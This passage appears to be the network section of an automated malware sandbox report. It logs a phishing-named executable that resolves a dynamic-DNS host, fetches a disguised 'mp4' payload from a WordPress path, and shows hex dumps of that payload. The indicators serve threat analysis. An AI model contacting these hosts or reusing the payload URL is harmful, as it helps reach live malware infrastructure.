                                                                Jan 9, 2025 19:09:59.339936972 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:09:59.658493996 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:18.115616083 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:18.485343933 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:18.860270023 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:19.610040903 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:19.899960995 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:19.953685999 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:20.219449043 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:20.221074104 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:20.548460960 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:20.548664093 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:20.876640081 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:38.128160000 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:38.443916082 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:38.444114923 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:38.710771084 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:38.762063026 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:39.030797005 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:39.032484055 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:39.348982096 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:39.349176884 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:39.689889908 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:51.774960041 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:52.091378927 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:52.091609955 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:52.358196020 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:52.399699926 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:52.666290998 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:52.668788910 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:52.989183903 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:10:52.989356995 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:10:53.315141916 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:11.786108017 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:12.110500097 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:12.110726118 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:12.377721071 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:12.426462889 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:12.692234993 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:12.694171906 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:13.017577887 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:13.017775059 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:13.345716000 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:31.787436962 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:32.104006052 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:32.104276896 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:32.371143103 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:32.422000885 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:32.687594891 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:32.689194918 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:33.017905951 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:33.018076897 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:33.344959021 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:46.679583073 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:47.001977921 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:47.002141953 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:47.268511057 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:47.309268951 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:47.575053930 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:47.575784922 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:47.900762081 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:11:47.900901079 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:11:48.220985889 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:12:06.680212975 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:12:06.997441053 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:12:06.997570992 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:12:07.264098883 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:12:07.304866076 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:12:07.571091890 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:12:07.571877003 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:12:07.892075062 CET5078749752193.187.91.218192.168.11.20
                                                                Jan 9, 2025 19:12:07.892216921 CET4975250787192.168.11.20193.187.91.218
                                                                Jan 9, 2025 19:12:08.220158100 CET5078749752193.187.91.218192.168.11.20

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 9, 2025 19:07:38.630899906 CET6156253192.168.11.201.1.1.1
                                                                Jan 9, 2025 19:07:38.904886007 CET53615621.1.1.1192.168.11.20
                                                                Jan 9, 2025 19:07:56.763575077 CET5404353192.168.11.201.1.1.1
                                                                Jan 9, 2025 19:07:56.914554119 CET53540431.1.1.1192.168.11.20

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 9, 2025 19:07:38.630899906 CET192.168.11.201.1.1.10xd77bStandard query (0)www.chirreeirl.comA (IP address)IN (0x0001)false
                                                                Jan 9, 2025 19:07:56.763575077 CET192.168.11.201.1.1.10xe0f4Standard query (0)pureeratee.duckdns.orgA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 9, 2025 19:07:38.904886007 CET1.1.1.1192.168.11.200xd77bNo error (0)www.chirreeirl.comchirreeirl.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 9, 2025 19:07:38.904886007 CET1.1.1.1192.168.11.200xd77bNo error (0)chirreeirl.com209.58.149.225A (IP address)IN (0x0001)false
                                                                Jan 9, 2025 19:07:56.914554119 CET1.1.1.1192.168.11.200xe0f4No error (0)pureeratee.duckdns.org193.187.91.218A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.chirreeirl.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.11.2049751209.58.149.2254434992C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-09 18:07:39 UTC220OUTGET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                Host: www.chirreeirl.com
                                                                Connection: Keep-Alive
                                                                2025-01-09 18:07:39 UTC209INHTTP/1.1 200 OK
                                                                Date: Thu, 09 Jan 2025 18:07:39 GMT
                                                                Server: Apache
                                                                Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1260040
                                                                Connection: close
                                                                Content-Type: video/mp4
                                                                2025-01-09 18:07:39 UTC7983INData Raw: ca 20 ef 75 c7 15 32 30 87 a8 15 24 29 fa 4b e9 bf 0c 84 b6 85 ca f7 02 a1 01 d8 63 50 e8 46 4a 90 09 2c ef 47 86 63 53 b3 10 00 17 c2 d0 e4 51 c1 39 10 93 e1 e6 f0 62 cf 4d 2b 62 bf 98 5f 60 91 5e 81 e0 94 ae eb 5f e0 0b 14 8a 51 cc 45 d3 f7 07 ec 8a 25 35 67 04 c2 4a ef 0e 4c 4b 43 b3 2a d1 81 ed 20 a3 ed c1 27 6b 82 eb 24 b6 0c 25 bf df 2f 35 63 50 a7 dc 2b d3 ee bb bf 0c bd 42 a7 14 2f 32 0f fc 8e 38 07 a5 43 8b c7 3c fa c4 97 53 22 c6 3d f4 f4 a3 a4 d6 2d 88 73 7c 7c 25 d8 e7 bd e8 b0 82 ca a4 8c e8 73 e1 77 12 e3 ac 43 74 f4 4a 73 64 37 51 41 2f b7 a7 8e cc e4 27 9c 00 18 76 c9 17 eb 32 fc 61 03 88 cd 5f ce cf 54 86 b1 1d 0d b7 dc fd db 49 ec 2f 53 b2 64 33 1d 44 d3 42 9e 57 a9 51 4f b8 e2 6e 0d 01 dd 15 14 14 87 a0 3f ca 94 2c 59 d0 7e 9d 12 4f 02
                                                                Data Ascii: u20$)KcPFJ,GcSQ9bM+b_`^_QE%5gJLKC* 'k$%/5cP+B/28C<S"=-s||%swCtJsd7QA/'v2a_TI/Sd3DBWQOn?,Y~O
                                                                2025-01-09 18:07:39 UTC8000INData Raw: 0b eb 2f 8d f9 b9 cd f9 4c 18 4f 71 c7 39 d9 19 da f4 39 9b 25 91 f8 2a 01 81 f8 10 84 8d 46 9e 12 d3 62 f7 f6 42 19 42 69 3e 63 23 9c 55 44 dd bc d6 a5 22 c2 0e 3e ab 14 48 12 32 d3 4f 24 0a 6e 95 b5 55 07 da 4c b9 5c 4a f6 d8 ba e1 ee c6 64 2c cc 83 e1 57 33 32 7a 39 9f f6 4d 10 62 3f 7b fc 76 91 0d b2 1a f3 e3 8c 78 d3 8d fc 6d 54 fb 66 c1 aa 4c e4 ad 3b 69 5d aa 56 dc 22 79 a1 be 79 09 a9 7b d7 90 0d 38 97 d3 f6 f5 88 c9 cf 7b 89 38 cf 9a df e7 5d 50 31 a1 a4 8f 11 32 bb 9a 50 d1 74 54 9e 77 96 ff 46 eb 7c 3f 5f ee 77 09 e1 1a 00 f0 bf ab 8d 1e 77 a6 40 d0 0d 81 44 46 92 9d b2 a0 d1 fb 0e 78 b9 62 51 4d ba d9 d9 7f 33 35 e4 69 3b 3d 12 af df b4 1d e8 37 27 8b b8 4c 86 93 7b 5a 70 1a d0 35 54 6e 39 f2 87 07 16 19 ce 54 fb 36 a4 64 50 4a c5 bb d3 9e 6e
                                                                Data Ascii: /LOq99%*FbBBi>c#UD">H2O$nUL\Jd,W32z9Mb?{vxmTfL;i]V"yy{8{8]P12PtTwF|?_ww@DFxbQM35i;=7'L{Zp5Tn9T6dPJn
                                                                2025-01-09 18:07:39 UTC8000INData Raw: 2a 3a c6 a9 a4 a6 03 f5 e2 d3 7e 3c f5 95 1d d1 b8 54 ec a0 54 49 dd d6 59 7c b2 3c d1 04 e5 94 77 e3 89 c2 69 70 b4 39 03 c8 72 e9 89 d2 ed 17 fb 45 a3 68 e8 e0 98 11 cb 17 68 0f 0e a7 e0 2d 5b 52 f8 ff f2 4d d7 95 12 3d 35 34 bb 04 cb 56 f5 81 c8 58 07 2d 4e c9 a9 45 84 45 8d 35 d8 63 2b ec 9d 1e ed e7 b8 a8 99 17 ed 19 81 5e 35 6d 9a c5 70 4d 9a b1 66 db b0 61 b6 83 18 4d bd eb 21 1d 16 83 37 9d 7f af 88 55 7b 78 f4 a3 7a c6 d6 11 4d 07 15 61 a8 c2 6e a4 57 7f 45 80 ce 37 fe 34 af 99 23 70 e8 23 79 84 f7 ae 97 23 9e a9 94 43 a7 66 e3 78 1b 01 ec 9a ae 9d 2b 38 49 1d 0e 25 83 a2 d2 41 eb 5a f8 fc a8 b4 45 82 2b 98 fc 4a 0d 6c 8b c4 9a 9c 38 d8 e5 01 a7 54 72 39 a3 89 2e 30 27 d6 ee df b9 06 d8 60 b4 e2 56 08 aa 92 8d f2 8d 33 fd e0 b3 0f a8 dd ff be f1
                                                                Data Ascii: *:~<TTIY|<wip9rEhh-[RM=54VX-NEE5c+^5mpMfaM!7U{xzManWE74#p#y#Cfx+8I%AZE+Jl8Tr9.0'`V3
                                                                2025-01-09 18:07:39 UTC8000INData Raw: bd b0 8e c4 d2 2b 47 bf b5 9b 5d 86 f3 63 6e d8 44 2d e1 64 6e cf 11 57 b5 3a de 6e 96 4b 0d fc 83 dd ef 37 a6 d7 21 10 a2 95 35 94 b1 7a 06 28 8a 8a d9 11 41 a7 2e b1 90 98 52 a8 c5 76 8d 89 9b 0e 13 9e 0f 22 f5 be d1 f3 2a 6f 41 1a 28 9d 77 3d aa cc f4 f3 2e e4 fe e7 bb 49 be 64 34 25 dd 6b 31 8b 93 16 b1 04 c7 c7 5a ba 3f b8 bd b4 33 0c e1 5b 17 95 4e b8 26 86 8a 04 e1 5e 2b fa 3a ab fb d6 be 92 0c d7 12 1f 82 52 30 5f fe 0b 06 ba 11 84 dc 00 8e 23 bc 40 b8 51 fa 2d 51 66 9e 7c e5 69 f5 dc 2f 27 f1 0a d1 3a 89 2d 5e b4 8e 2d 20 a1 34 2f f8 a2 8b a5 1e e6 9f 7a d4 1e f1 2e c9 b1 d4 8d 6c 49 aa 61 95 23 86 5d 76 90 f4 57 1b f4 a5 69 5c 4f 94 7f 41 c8 80 43 8a e1 80 05 9d 9b 6b bb cd d9 00 d4 bb b7 1c 50 bc 98 44 a8 0e e4 31 9e 53 56 33 3b 22 99 e9 ac 8c
                                                                Data Ascii: +G]cnD-dnW:nK7!5z(A.Rv"*oA(w=.Id4%k1Z?3[N&^+:R0_#@Q-Qf|i/':-^- 4/z.lIa#]vWi\OACkPD1SV3;"
                                                                2025-01-09 18:07:39 UTC8000INData Raw: 18 5f 26 38 49 d3 8b 55 7a a8 63 80 c7 a2 a8 27 3b df 2a f2 34 17 65 52 b6 c3 26 44 af 3e 62 97 cf e3 9c 52 14 26 d9 94 f5 aa d1 e3 e7 90 9d 4a 4f a5 aa b9 3b 28 e7 c5 c8 78 be 58 10 07 29 00 6e 8f 5a 5e 70 fd ec a0 94 43 82 02 b8 81 1e bd a7 ea 51 67 d7 5e 88 8f bc a8 c3 01 2b 24 e6 77 86 27 b1 90 49 a2 4b 9d fa c8 b3 40 23 c0 7d fa b7 1b c6 67 01 67 fb 0b 83 6a cd e9 bb 37 a9 23 df 66 42 3b 93 f5 28 d8 45 62 fe 52 85 a3 d3 db 37 d6 21 d6 5b 6a 7f c5 62 39 fc 92 9c a1 92 e2 4f fa 08 4e ab e6 9b 29 ca 3b b5 d6 af 1e 01 6f 56 7d a7 a6 e6 7a 9a 7c 46 e4 53 87 96 bf ea 6e 31 1c 95 c3 ec 5c 43 e0 8e 3c 50 ee 5a c0 38 21 c7 7f 0a 21 3c f9 f7 8a 74 86 24 b5 7a b2 e3 e1 0c e2 85 d1 5d 48 35 4e e1 4d 3b 2b bc 11 74 3a 16 ff 16 43 87 66 18 47 01 59 b3 50 94 f5 39
                                                                Data Ascii: _&8IUzc';*4eR&D>bR&JO;(xX)nZ^pCQg^+$w'IK@#}ggj7#fB;(EbR7![jb9ON);oV}z|FSn1\C<PZ8!!<t$z]H5NM;+t:CfGYP9
                                                                2025-01-09 18:07:39 UTC8000INData Raw: 44 28 d8 9f ab ef c5 71 cc 06 e3 6c 19 d5 ea eb 36 7b e3 73 8c 64 8a 12 35 34 fb 20 3e 93 4c 51 73 83 e0 57 58 af 57 94 97 30 73 b2 24 02 93 06 ee 29 5a ce 7b a4 7e d5 41 fc 7e 46 98 69 6d 44 8c 87 c0 ef 99 54 57 0c 8f a3 c6 de 96 b4 d9 be 2e 70 f4 b2 5e 31 92 af ce 51 ca 56 1b 58 bc 6f 05 63 ee 7e 6c 86 d8 7d ff b5 a9 59 5e 5a ef ac 6e 3f ab 88 95 ed e5 7f f0 39 64 83 fc d4 a8 c1 43 8e 4d c9 b2 01 59 96 fd ad 84 ad 9f 09 98 17 e6 6b 01 f3 1d 7e b8 d9 90 60 28 58 c2 f1 d0 49 da 69 b7 0f 74 8c 80 e9 d7 a5 97 8d 73 ff 22 f3 40 e6 59 ff 43 87 f4 98 68 6b f1 72 07 b2 40 3e 55 3c c9 c4 54 87 30 c5 c6 16 be 13 c9 0e f5 bf dd 68 f9 3a d0 5f 8b ea 1c c8 b5 a3 32 b2 34 82 6a 8e c4 d7 4b ce 3f fb 1a e5 dc d5 34 cd 20 cf e6 bb e4 96 3d ff 51 67 61 29 47 ed b0 79 40
                                                                Data Ascii: D(ql6{sd54 >LQsWXW0s$)Z{~A~FimDTW.p^1QVXoc~l}Y^Zn?9dCMYk~`(XIits"@YChkr@>U<T0h:_24jK?4 =Qga)Gy@
                                                                2025-01-09 18:07:39 UTC8000INData Raw: 72 0c fb b9 d0 de fe 67 3d 5d c1 1e 31 bb 59 c8 74 26 3d 54 6f 6c df 06 1e 01 19 a3 4f f0 19 68 39 3d 19 18 df 9a 0f dd 05 7b c9 a9 b4 0f 9c 10 6d 14 1d 95 2f c0 1e 17 ef 20 5e d7 87 0f df 78 ed 5b 47 2c ad f4 31 97 87 f0 c3 b3 21 e4 da 51 bd 97 25 e4 d5 85 6f f0 3e e6 73 33 62 27 b4 cf 70 71 78 79 bd 87 0e 10 f5 88 61 c1 ce 9b 68 ab 4a a3 c0 ed 2f 4b 76 54 17 49 8f af 46 f2 17 af 51 c2 33 c7 5d e4 54 e5 0d 05 2d e7 9f 57 87 7d 29 a8 3d 57 87 ac 00 6a bd bc 3f d8 71 b0 93 77 bf 65 82 32 63 70 06 3a 3d e7 95 2e 40 a7 2d 42 a0 34 9c c9 5a 98 3d be 19 26 5d a4 e9 38 ee 06 d8 bc bd 91 f4 e3 ad 48 ff f2 03 2c 51 9a ad 67 c0 e0 74 b1 33 a5 38 16 4a e4 54 e3 97 fc 51 8e e7 be e3 10 18 bf 65 68 17 66 46 f2 f6 0e 63 ea 20 4f d1 4c 73 a3 39 6f 22 90 7c 81 6d e1 c1
                                                                Data Ascii: rg=]1Yt&=TolOh9={m/ ^x[G,1!Q%o>s3b'pqxyahJ/KvTIFQ3]T-W})=Wj?qwe2cp:=.@-B4Z=&]8H,Qgt38JTQehfFc OLs9o"|m
                                                                2025-01-09 18:07:39 UTC8000INData Raw: 31 34 73 09 6e 1d 20 25 f6 de 83 20 f0 72 d1 a0 79 f5 98 53 70 bf b0 a0 1d f7 3c 8f 1d 3d 9a 79 49 6c f1 d8 e9 50 65 70 e9 9c bd a4 2f 51 8c 79 75 60 22 18 bb 9e f3 c2 84 18 66 e8 ae 8a eb b6 1a b0 75 11 70 e0 a2 82 0f ce 14 3e 35 39 81 24 c0 10 1a 3c 5d 79 25 b4 a2 f1 a0 70 0b c4 52 de f8 f8 ae d5 99 0d 83 17 ff 63 22 e1 88 9d 63 ae 79 1d 2e 3e 9a 20 35 98 c5 45 b9 81 02 f7 76 a3 5e 90 03 60 44 ab a4 21 48 56 0a bd c1 f0 ce 99 70 de 3d 2c 57 b8 04 67 61 1e e6 65 1a f7 3d 91 95 7d 26 ef ad 59 e4 7d 84 ce 5d 50 9b f0 28 c2 dd 15 e1 97 67 52 00 c5 d5 44 61 9c 00 fe 91 63 d9 a9 2d a8 f4 d3 e3 c7 06 76 a9 a7 22 4e e2 9b bf 7b a7 49 b3 2a 17 ab 85 75 b7 42 d0 96 c2 db 71 d2 cb 42 5a 20 dc a9 d7 bc 12 83 a1 78 5f 3e bf 1b f1 5b da 0f 7b 0f c0 92 7d ec be 6d d7
                                                                Data Ascii: 14sn % rySp<=yIlPep/Qyu`"fup>59$<]y%pRc"cy.> 5Ev^`D!HVp=,Wgae=}&Y}]P(gRDac-v"N{I*uBqBZ x_>[{}m
                                                                2025-01-09 18:07:39 UTC8000INData Raw: e4 1d 1b 40 80 1b 40 3e 1e 3b 58 03 6b fd b4 2c 46 e8 1c e4 4f af 85 16 3b c4 05 a2 9f 7a 43 14 0b 9d 3a ec b3 31 9a 73 7b 89 20 8c 80 66 67 44 6a 79 75 ec 18 df d7 f8 b1 bc 71 a3 1b 8c f1 71 5a c0 f8 bc 0c ab 97 4d 86 e3 d0 d4 5c 3f 17 1a 76 f4 e6 05 bc 58 10 6a 7d 32 d0 dc 62 8b 07 ec 7e f8 1e a6 fb 67 4b a8 c5 1e ef ac b7 62 cf f1 8f 2f 40 d9 7a 22 b1 24 ed 17 63 bf 97 5a 49 3f 8a 8e 74 a6 5a c7 03 9b 6f 29 47 14 6b 18 de f1 b2 e1 84 55 94 de 62 fa 74 4f 02 5c 00 4e 81 b3 38 0e c4 f9 17 c6 b9 25 ac ec 8b a5 41 ec 79 39 fb a8 e1 ae 5c 47 46 9e bd d4 5b 1a 05 1b d3 31 a5 c4 3c dc 46 56 72 d6 b3 91 17 e0 0e 21 42 d6 ea b4 21 d5 5f 5d 2e a5 a4 b3 84 f0 6b e7 7c 8b b0 13 79 0c bc c2 95 e7 9e d1 cc 20 d3 ee 7e cf 79 b0 50 96 9b 68 90 f8 e0 cb ab 3b 64 7b 30
                                                                Data Ascii: @@>;Xk,FO;zC:1s{ fgDjyuqqZM\?vXj}2b~gKb/@z"$cZI?tZo)GkUbtO\N8%Ay9\GF[1<FVr!B!_].k|y ~yPh;d{0
                                                                2025-01-09 18:07:39 UTC8000INData Raw: 03 c0 d7 67 18 d9 87 53 4b 34 dc 3d a7 21 35 2c 34 ff d0 c2 b5 76 d3 d6 19 41 2f bf 3a a2 48 82 7f 7a 8b e6 c7 74 9a f5 31 4d c6 97 e1 49 0a 74 c9 7b cc 4b 4d f0 8a be f2 37 25 74 26 b3 99 f6 57 8d db 42 36 de 51 a8 59 4c a1 5a b4 a2 cf 3a 4d 1a 03 ef 7d 67 97 6a c1 dd 1c e9 b3 b0 27 92 b8 28 21 89 1a e8 2c 8e b2 72 35 55 09 2d 86 2e f8 65 54 db 8e 5e b7 e2 7c 38 36 68 2d a1 6a 65 dc 69 d9 89 cf 81 eb 8d 96 f3 3d cf 3e bd 1e 14 5c 2d e4 5c 9b 80 7d 3f 05 da 52 2e 52 fb f1 df e1 7f d0 31 ef b1 6b 0b ca 71 67 56 6f 9a 86 e5 aa b9 4e 51 f2 08 45 10 d5 ee 7e 28 3a 30 ce 8b da 21 fe 07 68 fd 11 3c 15 41 f2 92 b7 66 87 b1 c4 91 d6 9e f2 54 ed aa d4 26 f6 53 ea a9 ce 59 1a 36 ba e7 9e b9 a1 3b b5 ff 83 cd 31 e5 4e 30 b9 6a 51 c0 5d 47 b6 81 a6 41 03 c4 ef 23 58
                                                                Data Ascii: gSK4=!5,4vA/:Hzt1MIt{KM7%t&WB6QYLZ:M}gj'(!,r5U-.eT^|86h-jei=>\-\}?R.R1kqgVoNQE~(:0!h<AfT&SY6;1N0jQ]GA#X


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.11.2049753209.58.149.2254431788C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-09 18:08:00 UTC220OUTGET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                Host: www.chirreeirl.com
                                                                Connection: Keep-Alive
                                                                2025-01-09 18:08:00 UTC209INHTTP/1.1 200 OK
                                                                Date: Thu, 09 Jan 2025 18:08:00 GMT
                                                                Server: Apache
                                                                Last-Modified: Fri, 03 Jan 2025 12:37:34 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1260040
                                                                Connection: close
                                                                Content-Type: video/mp4
                                                                2025-01-09 18:08:00 UTC7983INData Raw: ca 20 ef 75 c7 15 32 30 87 a8 15 24 29 fa 4b e9 bf 0c 84 b6 85 ca f7 02 a1 01 d8 63 50 e8 46 4a 90 09 2c ef 47 86 63 53 b3 10 00 17 c2 d0 e4 51 c1 39 10 93 e1 e6 f0 62 cf 4d 2b 62 bf 98 5f 60 91 5e 81 e0 94 ae eb 5f e0 0b 14 8a 51 cc 45 d3 f7 07 ec 8a 25 35 67 04 c2 4a ef 0e 4c 4b 43 b3 2a d1 81 ed 20 a3 ed c1 27 6b 82 eb 24 b6 0c 25 bf df 2f 35 63 50 a7 dc 2b d3 ee bb bf 0c bd 42 a7 14 2f 32 0f fc 8e 38 07 a5 43 8b c7 3c fa c4 97 53 22 c6 3d f4 f4 a3 a4 d6 2d 88 73 7c 7c 25 d8 e7 bd e8 b0 82 ca a4 8c e8 73 e1 77 12 e3 ac 43 74 f4 4a 73 64 37 51 41 2f b7 a7 8e cc e4 27 9c 00 18 76 c9 17 eb 32 fc 61 03 88 cd 5f ce cf 54 86 b1 1d 0d b7 dc fd db 49 ec 2f 53 b2 64 33 1d 44 d3 42 9e 57 a9 51 4f b8 e2 6e 0d 01 dd 15 14 14 87 a0 3f ca 94 2c 59 d0 7e 9d 12 4f 02
                                                                Data Ascii: u20$)KcPFJ,GcSQ9bM+b_`^_QE%5gJLKC* 'k$%/5cP+B/28C<S"=-s||%swCtJsd7QA/'v2a_TI/Sd3DBWQOn?,Y~O
                                                                2025-01-09 18:08:01 UTC8000INData Raw: 0b eb 2f 8d f9 b9 cd f9 4c 18 4f 71 c7 39 d9 19 da f4 39 9b 25 91 f8 2a 01 81 f8 10 84 8d 46 9e 12 d3 62 f7 f6 42 19 42 69 3e 63 23 9c 55 44 dd bc d6 a5 22 c2 0e 3e ab 14 48 12 32 d3 4f 24 0a 6e 95 b5 55 07 da 4c b9 5c 4a f6 d8 ba e1 ee c6 64 2c cc 83 e1 57 33 32 7a 39 9f f6 4d 10 62 3f 7b fc 76 91 0d b2 1a f3 e3 8c 78 d3 8d fc 6d 54 fb 66 c1 aa 4c e4 ad 3b 69 5d aa 56 dc 22 79 a1 be 79 09 a9 7b d7 90 0d 38 97 d3 f6 f5 88 c9 cf 7b 89 38 cf 9a df e7 5d 50 31 a1 a4 8f 11 32 bb 9a 50 d1 74 54 9e 77 96 ff 46 eb 7c 3f 5f ee 77 09 e1 1a 00 f0 bf ab 8d 1e 77 a6 40 d0 0d 81 44 46 92 9d b2 a0 d1 fb 0e 78 b9 62 51 4d ba d9 d9 7f 33 35 e4 69 3b 3d 12 af df b4 1d e8 37 27 8b b8 4c 86 93 7b 5a 70 1a d0 35 54 6e 39 f2 87 07 16 19 ce 54 fb 36 a4 64 50 4a c5 bb d3 9e 6e
                                                                Data Ascii: /LOq99%*FbBBi>c#UD">H2O$nUL\Jd,W32z9Mb?{vxmTfL;i]V"yy{8{8]P12PtTwF|?_ww@DFxbQM35i;=7'L{Zp5Tn9T6dPJn
                                                                2025-01-09 18:08:01 UTC8000INData Raw: 2a 3a c6 a9 a4 a6 03 f5 e2 d3 7e 3c f5 95 1d d1 b8 54 ec a0 54 49 dd d6 59 7c b2 3c d1 04 e5 94 77 e3 89 c2 69 70 b4 39 03 c8 72 e9 89 d2 ed 17 fb 45 a3 68 e8 e0 98 11 cb 17 68 0f 0e a7 e0 2d 5b 52 f8 ff f2 4d d7 95 12 3d 35 34 bb 04 cb 56 f5 81 c8 58 07 2d 4e c9 a9 45 84 45 8d 35 d8 63 2b ec 9d 1e ed e7 b8 a8 99 17 ed 19 81 5e 35 6d 9a c5 70 4d 9a b1 66 db b0 61 b6 83 18 4d bd eb 21 1d 16 83 37 9d 7f af 88 55 7b 78 f4 a3 7a c6 d6 11 4d 07 15 61 a8 c2 6e a4 57 7f 45 80 ce 37 fe 34 af 99 23 70 e8 23 79 84 f7 ae 97 23 9e a9 94 43 a7 66 e3 78 1b 01 ec 9a ae 9d 2b 38 49 1d 0e 25 83 a2 d2 41 eb 5a f8 fc a8 b4 45 82 2b 98 fc 4a 0d 6c 8b c4 9a 9c 38 d8 e5 01 a7 54 72 39 a3 89 2e 30 27 d6 ee df b9 06 d8 60 b4 e2 56 08 aa 92 8d f2 8d 33 fd e0 b3 0f a8 dd ff be f1
                                                                Data Ascii: *:~<TTIY|<wip9rEhh-[RM=54VX-NEE5c+^5mpMfaM!7U{xzManWE74#p#y#Cfx+8I%AZE+Jl8Tr9.0'`V3
